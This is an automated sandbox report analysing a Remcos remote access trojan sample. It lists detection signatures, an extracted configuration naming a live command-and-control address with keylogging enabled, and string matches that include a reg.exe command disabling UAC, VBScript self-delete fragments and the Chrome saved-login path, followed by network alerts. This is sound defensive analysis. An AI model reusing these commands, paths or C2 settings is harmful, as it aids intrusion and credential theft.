Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NssBkEQKsI.exe

Overview

General Information

Sample name:NssBkEQKsI.exe
renamed because original name is a hash value
Original sample name:e9077ad335bfe27a3217406b06411f96d66e7af4bd59e21ba88f1b6c59cd24b5.exe
Analysis ID:1588307
MD5:575d16384315352aa0a0b0eab3a62b6c
SHA1:2bd99b62a965febf54c0e72a1afee93c12f135b6
SHA256:e9077ad335bfe27a3217406b06411f96d66e7af4bd59e21ba88f1b6c59cd24b5
Tags:exeRemcosRATuser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • NssBkEQKsI.exe (PID: 7800 cmdline: "C:\Users\user\Desktop\NssBkEQKsI.exe" MD5: 575D16384315352AA0A0B0EAB3A62B6C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
SourceRuleDescriptionAuthorStrings
NssBkEQKsI.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    NssBkEQKsI.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      NssBkEQKsI.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        NssBkEQKsI.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aaf8:$a1: Remcos restarted by watchdog!
        • 0x6b070:$a3: %02i:%02i:%02i:%03i
        NssBkEQKsI.exeREMCOS_RAT_variantsunknownunknown
        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64e04:$str_b2: Executing file:
        • 0x65c3c:$str_b3: GetDirectListeningPort
        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65780:$str_b7: \update.vbs
        • 0x64e2c:$str_b9: Downloaded file:
        • 0x64e18:$str_b10: Downloading file:
        • 0x64ebc:$str_b12: Failed to upload file:
        • 0x65c04:$str_b13: StartForward
        • 0x65c24:$str_b14: StopForward
        • 0x656d8:$str_b15: fso.DeleteFile "
        • 0x6566c:$str_b16: On Error Resume Next
        • 0x65708:$str_b17: fso.DeleteFolder "
        • 0x64eac:$str_b18: Uploaded file:
        • 0x64e6c:$str_b19: Unable to delete:
        • 0x656a0:$str_b20: while fso.FileExists("
        • 0x65349:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
          SourceRuleDescriptionAuthorStrings
          00000001.00000002.3721678274.000000000232F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x146f8:$a1: Remcos restarted by watchdog!
                  • 0x14c70:$a3: %02i:%02i:%02i:%03i
                  Click to see the 9 entries
                  SourceRuleDescriptionAuthorStrings
                  1.0.NssBkEQKsI.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    1.0.NssBkEQKsI.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                      1.0.NssBkEQKsI.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        1.0.NssBkEQKsI.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                        • 0x6aaf8:$a1: Remcos restarted by watchdog!
                        • 0x6b070:$a3: %02i:%02i:%02i:%03i
                        1.0.NssBkEQKsI.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                        • 0x64e04:$str_b2: Executing file:
                        • 0x65c3c:$str_b3: GetDirectListeningPort
                        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                        • 0x65780:$str_b7: \update.vbs
                        • 0x64e2c:$str_b9: Downloaded file:
                        • 0x64e18:$str_b10: Downloading file:
                        • 0x64ebc:$str_b12: Failed to upload file:
                        • 0x65c04:$str_b13: StartForward
                        • 0x65c24:$str_b14: StopForward
                        • 0x656d8:$str_b15: fso.DeleteFile "
                        • 0x6566c:$str_b16: On Error Resume Next
                        • 0x65708:$str_b17: fso.DeleteFolder "
                        • 0x64eac:$str_b18: Uploaded file:
                        • 0x64e6c:$str_b19: Unable to delete:
                        • 0x656a0:$str_b20: while fso.FileExists("
                        • 0x65349:$str_c0: [Firefox StoredLogins not found]
                        Click to see the 7 entries

                        Stealing of Sensitive Information

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\NssBkEQKsI.exe, ProcessId: 7800, TargetFilename: C:\ProgramData\remcos\logs.dat
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-10T23:46:38.038804+010020327761Malware Command and Control Activity Detected192.168.2.1049706192.210.150.263678TCP
                        2025-01-10T23:46:40.587853+010020327761Malware Command and Control Activity Detected192.168.2.1049708192.210.150.263678TCP
                        2025-01-10T23:46:43.104615+010020327761Malware Command and Control Activity Detected192.168.2.1049719192.210.150.263678TCP
                        2025-01-10T23:46:45.542181+010020327761Malware Command and Control Activity Detected192.168.2.1049735192.210.150.263678TCP
                        2025-01-10T23:46:48.010271+010020327761Malware Command and Control Activity Detected192.168.2.1049750192.210.150.263678TCP
                        2025-01-10T23:46:50.431592+010020327761Malware Command and Control Activity Detected192.168.2.1049769192.210.150.263678TCP
                        2025-01-10T23:46:52.853807+010020327761Malware Command and Control Activity Detected192.168.2.1049782192.210.150.263678TCP
                        2025-01-10T23:46:55.322659+010020327761Malware Command and Control Activity Detected192.168.2.1049798192.210.150.263678TCP
                        2025-01-10T23:46:57.759935+010020327761Malware Command and Control Activity Detected192.168.2.1049817192.210.150.263678TCP
                        2025-01-10T23:47:00.166606+010020327761Malware Command and Control Activity Detected192.168.2.1049833192.210.150.263678TCP
                        2025-01-10T23:47:02.588216+010020327761Malware Command and Control Activity Detected192.168.2.1049849192.210.150.263678TCP
                        2025-01-10T23:47:04.994646+010020327761Malware Command and Control Activity Detected192.168.2.1049864192.210.150.263678TCP
                        2025-01-10T23:47:07.419448+010020327761Malware Command and Control Activity Detected192.168.2.1049878192.210.150.263678TCP
                        2025-01-10T23:47:09.854116+010020327761Malware Command and Control Activity Detected192.168.2.1049891192.210.150.263678TCP
                        2025-01-10T23:47:12.322274+010020327761Malware Command and Control Activity Detected192.168.2.1049906192.210.150.263678TCP
                        2025-01-10T23:47:14.778983+010020327761Malware Command and Control Activity Detected192.168.2.1049918192.210.150.263678TCP
                        2025-01-10T23:47:17.229357+010020327761Malware Command and Control Activity Detected192.168.2.1049931192.210.150.263678TCP
                        2025-01-10T23:47:19.650444+010020327761Malware Command and Control Activity Detected192.168.2.1049948192.210.150.263678TCP
                        2025-01-10T23:47:22.090426+010020327761Malware Command and Control Activity Detected192.168.2.1049962192.210.150.263678TCP
                        2025-01-10T23:47:24.603840+010020327761Malware Command and Control Activity Detected192.168.2.1049975192.210.150.263678TCP
                        2025-01-10T23:47:27.026356+010020327761Malware Command and Control Activity Detected192.168.2.1049992192.210.150.263678TCP
                        2025-01-10T23:47:29.447333+010020327761Malware Command and Control Activity Detected192.168.2.1049997192.210.150.263678TCP
                        2025-01-10T23:47:31.916634+010020327761Malware Command and Control Activity Detected192.168.2.1049998192.210.150.263678TCP
                        2025-01-10T23:47:34.323303+010020327761Malware Command and Control Activity Detected192.168.2.1050000192.210.150.263678TCP
                        2025-01-10T23:47:36.760216+010020327761Malware Command and Control Activity Detected192.168.2.1050001192.210.150.263678TCP
                        2025-01-10T23:47:39.213306+010020327761Malware Command and Control Activity Detected192.168.2.1050002192.210.150.263678TCP
                        2025-01-10T23:47:41.666201+010020327761Malware Command and Control Activity Detected192.168.2.1050003192.210.150.263678TCP
                        2025-01-10T23:47:44.104426+010020327761Malware Command and Control Activity Detected192.168.2.1050004192.210.150.263678TCP
                        2025-01-10T23:47:46.557427+010020327761Malware Command and Control Activity Detected192.168.2.1050005192.210.150.263678TCP
                        2025-01-10T23:47:49.010073+010020327761Malware Command and Control Activity Detected192.168.2.1050006192.210.150.263678TCP
                        2025-01-10T23:47:51.467227+010020327761Malware Command and Control Activity Detected192.168.2.1050007192.210.150.263678TCP
                        2025-01-10T23:47:53.900556+010020327761Malware Command and Control Activity Detected192.168.2.1050008192.210.150.263678TCP
                        2025-01-10T23:47:56.338106+010020327761Malware Command and Control Activity Detected192.168.2.1050009192.210.150.263678TCP
                        2025-01-10T23:47:58.713128+010020327761Malware Command and Control Activity Detected192.168.2.1050010192.210.150.263678TCP
                        2025-01-10T23:48:01.072456+010020327761Malware Command and Control Activity Detected192.168.2.1050011192.210.150.263678TCP
                        2025-01-10T23:48:03.417804+010020327761Malware Command and Control Activity Detected192.168.2.1050012192.210.150.263678TCP
                        2025-01-10T23:48:05.775569+010020327761Malware Command and Control Activity Detected192.168.2.1050013192.210.150.263678TCP
                        2025-01-10T23:48:08.085966+010020327761Malware Command and Control Activity Detected192.168.2.1050014192.210.150.263678TCP
                        2025-01-10T23:48:10.340766+010020327761Malware Command and Control Activity Detected192.168.2.1050015192.210.150.263678TCP
                        2025-01-10T23:48:12.556648+010020327761Malware Command and Control Activity Detected192.168.2.1050016192.210.150.263678TCP
                        2025-01-10T23:48:14.776800+010020327761Malware Command and Control Activity Detected192.168.2.1050017192.210.150.263678TCP
                        2025-01-10T23:48:16.950392+010020327761Malware Command and Control Activity Detected192.168.2.1050018192.210.150.263678TCP
                        2025-01-10T23:48:19.279286+010020327761Malware Command and Control Activity Detected192.168.2.1050019192.210.150.263678TCP
                        2025-01-10T23:48:21.401263+010020327761Malware Command and Control Activity Detected192.168.2.1050020192.210.150.263678TCP
                        2025-01-10T23:48:23.494170+010020327761Malware Command and Control Activity Detected192.168.2.1050021192.210.150.263678TCP
                        2025-01-10T23:48:25.559337+010020327761Malware Command and Control Activity Detected192.168.2.1050022192.210.150.263678TCP
                        2025-01-10T23:48:27.619914+010020327761Malware Command and Control Activity Detected192.168.2.1050023192.210.150.263678TCP
                        2025-01-10T23:48:29.652750+010020327761Malware Command and Control Activity Detected192.168.2.1050024192.210.150.263678TCP
                        2025-01-10T23:48:31.702982+010020327761Malware Command and Control Activity Detected192.168.2.1050025192.210.150.263678TCP
                        2025-01-10T23:48:33.683347+010020327761Malware Command and Control Activity Detected192.168.2.1050026192.210.150.263678TCP
                        2025-01-10T23:48:35.706283+010020327761Malware Command and Control Activity Detected192.168.2.1050027192.210.150.263678TCP
                        2025-01-10T23:48:37.650228+010020327761Malware Command and Control Activity Detected192.168.2.1050028192.210.150.263678TCP
                        2025-01-10T23:48:39.572763+010020327761Malware Command and Control Activity Detected192.168.2.1050029192.210.150.263678TCP
                        2025-01-10T23:48:41.512330+010020327761Malware Command and Control Activity Detected192.168.2.1050030192.210.150.263678TCP
                        2025-01-10T23:48:43.431713+010020327761Malware Command and Control Activity Detected192.168.2.1050031192.210.150.263678TCP
                        2025-01-10T23:48:45.322813+010020327761Malware Command and Control Activity Detected192.168.2.1050032192.210.150.263678TCP
                        2025-01-10T23:48:47.183360+010020327761Malware Command and Control Activity Detected192.168.2.1050033192.210.150.263678TCP
                        2025-01-10T23:48:49.056783+010020327761Malware Command and Control Activity Detected192.168.2.1050034192.210.150.263678TCP
                        2025-01-10T23:48:50.884596+010020327761Malware Command and Control Activity Detected192.168.2.1050035192.210.150.263678TCP
                        2025-01-10T23:48:52.697201+010020327761Malware Command and Control Activity Detected192.168.2.1050036192.210.150.263678TCP
                        2025-01-10T23:48:54.509682+010020327761Malware Command and Control Activity Detected192.168.2.1050037192.210.150.263678TCP
                        2025-01-10T23:48:56.325241+010020327761Malware Command and Control Activity Detected192.168.2.1050038192.210.150.263678TCP
                        2025-01-10T23:48:58.150749+010020327761Malware Command and Control Activity Detected192.168.2.1050039192.210.150.263678TCP
                        2025-01-10T23:48:59.932285+010020327761Malware Command and Control Activity Detected192.168.2.1050040192.210.150.263678TCP
                        2025-01-10T23:49:01.726813+010020327761Malware Command and Control Activity Detected192.168.2.1050041192.210.150.263678TCP
                        2025-01-10T23:49:03.463157+010020327761Malware Command and Control Activity Detected192.168.2.1050042192.210.150.263678TCP
                        2025-01-10T23:49:05.213170+010020327761Malware Command and Control Activity Detected192.168.2.1050043192.210.150.263678TCP
                        2025-01-10T23:49:07.107250+010020327761Malware Command and Control Activity Detected192.168.2.1050044192.210.150.263678TCP
                        2025-01-10T23:49:08.839592+010020327761Malware Command and Control Activity Detected192.168.2.1050045192.210.150.263678TCP
                        2025-01-10T23:49:10.572382+010020327761Malware Command and Control Activity Detected192.168.2.1050046192.210.150.263678TCP
                        2025-01-10T23:49:12.260022+010020327761Malware Command and Control Activity Detected192.168.2.1050047192.210.150.263678TCP
                        2025-01-10T23:49:13.951458+010020327761Malware Command and Control Activity Detected192.168.2.1050048192.210.150.263678TCP
                        2025-01-10T23:49:15.634902+010020327761Malware Command and Control Activity Detected192.168.2.1050049192.210.150.263678TCP
                        2025-01-10T23:49:17.322566+010020327761Malware Command and Control Activity Detected192.168.2.1050050192.210.150.263678TCP
                        2025-01-10T23:49:18.998341+010020327761Malware Command and Control Activity Detected192.168.2.1050051192.210.150.263678TCP
                        2025-01-10T23:49:20.666335+010020327761Malware Command and Control Activity Detected192.168.2.1050052192.210.150.263678TCP
                        2025-01-10T23:49:22.307440+010020327761Malware Command and Control Activity Detected192.168.2.1050053192.210.150.263678TCP
                        2025-01-10T23:49:23.963461+010020327761Malware Command and Control Activity Detected192.168.2.1050054192.210.150.263678TCP
                        2025-01-10T23:49:25.620029+010020327761Malware Command and Control Activity Detected192.168.2.1050055192.210.150.263678TCP
                        2025-01-10T23:49:27.247458+010020327761Malware Command and Control Activity Detected192.168.2.1050056192.210.150.263678TCP
                        2025-01-10T23:49:28.869201+010020327761Malware Command and Control Activity Detected192.168.2.1050057192.210.150.263678TCP
                        2025-01-10T23:49:30.509927+010020327761Malware Command and Control Activity Detected192.168.2.1050058192.210.150.263678TCP
                        2025-01-10T23:49:32.150566+010020327761Malware Command and Control Activity Detected192.168.2.1050059192.210.150.263678TCP
                        2025-01-10T23:49:33.763388+010020327761Malware Command and Control Activity Detected192.168.2.1050060192.210.150.263678TCP
                        2025-01-10T23:49:35.353406+010020327761Malware Command and Control Activity Detected192.168.2.1050061192.210.150.263678TCP
                        2025-01-10T23:49:36.978324+010020327761Malware Command and Control Activity Detected192.168.2.1050062192.210.150.263678TCP
                        2025-01-10T23:49:38.556649+010020327761Malware Command and Control Activity Detected192.168.2.1050063192.210.150.263678TCP
                        2025-01-10T23:49:40.150548+010020327761Malware Command and Control Activity Detected192.168.2.1050064192.210.150.263678TCP
                        2025-01-10T23:49:41.728610+010020327761Malware Command and Control Activity Detected192.168.2.1050065192.210.150.263678TCP
                        2025-01-10T23:49:43.325498+010020327761Malware Command and Control Activity Detected192.168.2.1050066192.210.150.263678TCP
                        2025-01-10T23:49:44.900384+010020327761Malware Command and Control Activity Detected192.168.2.1050067192.210.150.263678TCP
                        2025-01-10T23:49:46.470439+010020327761Malware Command and Control Activity Detected192.168.2.1050068192.210.150.263678TCP
                        2025-01-10T23:49:48.030581+010020327761Malware Command and Control Activity Detected192.168.2.1050069192.210.150.263678TCP
                        2025-01-10T23:49:49.575801+010020327761Malware Command and Control Activity Detected192.168.2.1050070192.210.150.263678TCP
                        2025-01-10T23:49:51.119832+010020327761Malware Command and Control Activity Detected192.168.2.1050071192.210.150.263678TCP
                        2025-01-10T23:49:52.665872+010020327761Malware Command and Control Activity Detected192.168.2.1050072192.210.150.263678TCP
                        2025-01-10T23:49:54.246795+010020327761Malware Command and Control Activity Detected192.168.2.1050073192.210.150.263678TCP
                        2025-01-10T23:49:55.760572+010020327761Malware Command and Control Activity Detected192.168.2.1050074192.210.150.263678TCP
                        2025-01-10T23:49:57.278954+010020327761Malware Command and Control Activity Detected192.168.2.1050075192.210.150.263678TCP
                        2025-01-10T23:49:58.806795+010020327761Malware Command and Control Activity Detected192.168.2.1050076192.210.150.263678TCP
                        2025-01-10T23:50:00.369203+010020327761Malware Command and Control Activity Detected192.168.2.1050077192.210.150.263678TCP
                        2025-01-10T23:50:01.902690+010020327761Malware Command and Control Activity Detected192.168.2.1050078192.210.150.263678TCP
                        2025-01-10T23:50:03.431840+010020327761Malware Command and Control Activity Detected192.168.2.1050079192.210.150.263678TCP
                        2025-01-10T23:50:05.011346+010020327761Malware Command and Control Activity Detected192.168.2.1050080192.210.150.263678TCP
                        2025-01-10T23:50:06.525781+010020327761Malware Command and Control Activity Detected192.168.2.1050081192.210.150.263678TCP
                        2025-01-10T23:50:08.698876+010020327761Malware Command and Control Activity Detected192.168.2.1050082192.210.150.263678TCP
                        2025-01-10T23:50:10.215506+010020327761Malware Command and Control Activity Detected192.168.2.1050083192.210.150.263678TCP
                        2025-01-10T23:50:11.716764+010020327761Malware Command and Control Activity Detected192.168.2.1050084192.210.150.263678TCP
                        2025-01-10T23:50:13.214518+010020327761Malware Command and Control Activity Detected192.168.2.1050085192.210.150.263678TCP
                        2025-01-10T23:50:14.714467+010020327761Malware Command and Control Activity Detected192.168.2.1050086192.210.150.263678TCP
                        2025-01-10T23:50:16.229121+010020327761Malware Command and Control Activity Detected192.168.2.1050087192.210.150.263678TCP
                        2025-01-10T23:50:17.721126+010020327761Malware Command and Control Activity Detected192.168.2.1050088192.210.150.263678TCP
                        2025-01-10T23:50:19.261733+010020327761Malware Command and Control Activity Detected192.168.2.1050089192.210.150.263678TCP
                        2025-01-10T23:50:20.760294+010020327761Malware Command and Control Activity Detected192.168.2.1050090192.210.150.263678TCP
                        2025-01-10T23:50:22.234952+010020327761Malware Command and Control Activity Detected192.168.2.1050091192.210.150.263678TCP
                        2025-01-10T23:50:23.731533+010020327761Malware Command and Control Activity Detected192.168.2.1050092192.210.150.263678TCP
                        2025-01-10T23:50:25.259827+010020327761Malware Command and Control Activity Detected192.168.2.1050093192.210.150.263678TCP
                        2025-01-10T23:50:26.747677+010020327761Malware Command and Control Activity Detected192.168.2.1050094192.210.150.263678TCP
                        2025-01-10T23:50:28.246514+010020327761Malware Command and Control Activity Detected192.168.2.1050095192.210.150.263678TCP
                        2025-01-10T23:50:29.713046+010020327761Malware Command and Control Activity Detected192.168.2.1050096192.210.150.263678TCP
                        2025-01-10T23:50:31.198635+010020327761Malware Command and Control Activity Detected192.168.2.1050097192.210.150.263678TCP
                        2025-01-10T23:50:32.697268+010020327761Malware Command and Control Activity Detected192.168.2.1050098192.210.150.263678TCP
                        2025-01-10T23:50:34.182658+010020327761Malware Command and Control Activity Detected192.168.2.1050099192.210.150.263678TCP
                        2025-01-10T23:50:35.681746+010020327761Malware Command and Control Activity Detected192.168.2.1050100192.210.150.263678TCP
                        2025-01-10T23:50:37.197370+010020327761Malware Command and Control Activity Detected192.168.2.1050101192.210.150.263678TCP
                        2025-01-10T23:50:38.681762+010020327761Malware Command and Control Activity Detected192.168.2.1050102192.210.150.263678TCP
                        2025-01-10T23:50:40.166366+010020327761Malware Command and Control Activity Detected192.168.2.1050103192.210.150.263678TCP
                        2025-01-10T23:50:41.619541+010020327761Malware Command and Control Activity Detected192.168.2.1050104192.210.150.263678TCP
                        2025-01-10T23:50:43.075698+010020327761Malware Command and Control Activity Detected192.168.2.1050105192.210.150.263678TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: NssBkEQKsI.exeAvira: detected
                        Source: NssBkEQKsI.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                        Source: NssBkEQKsI.exeVirustotal: Detection: 76%Perma Link
                        Source: NssBkEQKsI.exeReversingLabs: Detection: 95%
                        Source: Yara matchFile source: NssBkEQKsI.exe, type: SAMPLE
                        Source: Yara matchFile source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.3721678274.000000000232F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                        Source: NssBkEQKsI.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_0043293A
                        Source: NssBkEQKsI.exe, 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4b7ee450-2

                        Exploits

                        barindex
                        Source: Yara matchFile source: NssBkEQKsI.exe, type: SAMPLE
                        Source: Yara matchFile source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00406764 _wcslen,CoGetObject,1_2_00406764
                        Source: NssBkEQKsI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0044D5E9 FindFirstFileExA,1_2_0044D5E9
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49706 -> 192.210.150.26:3678
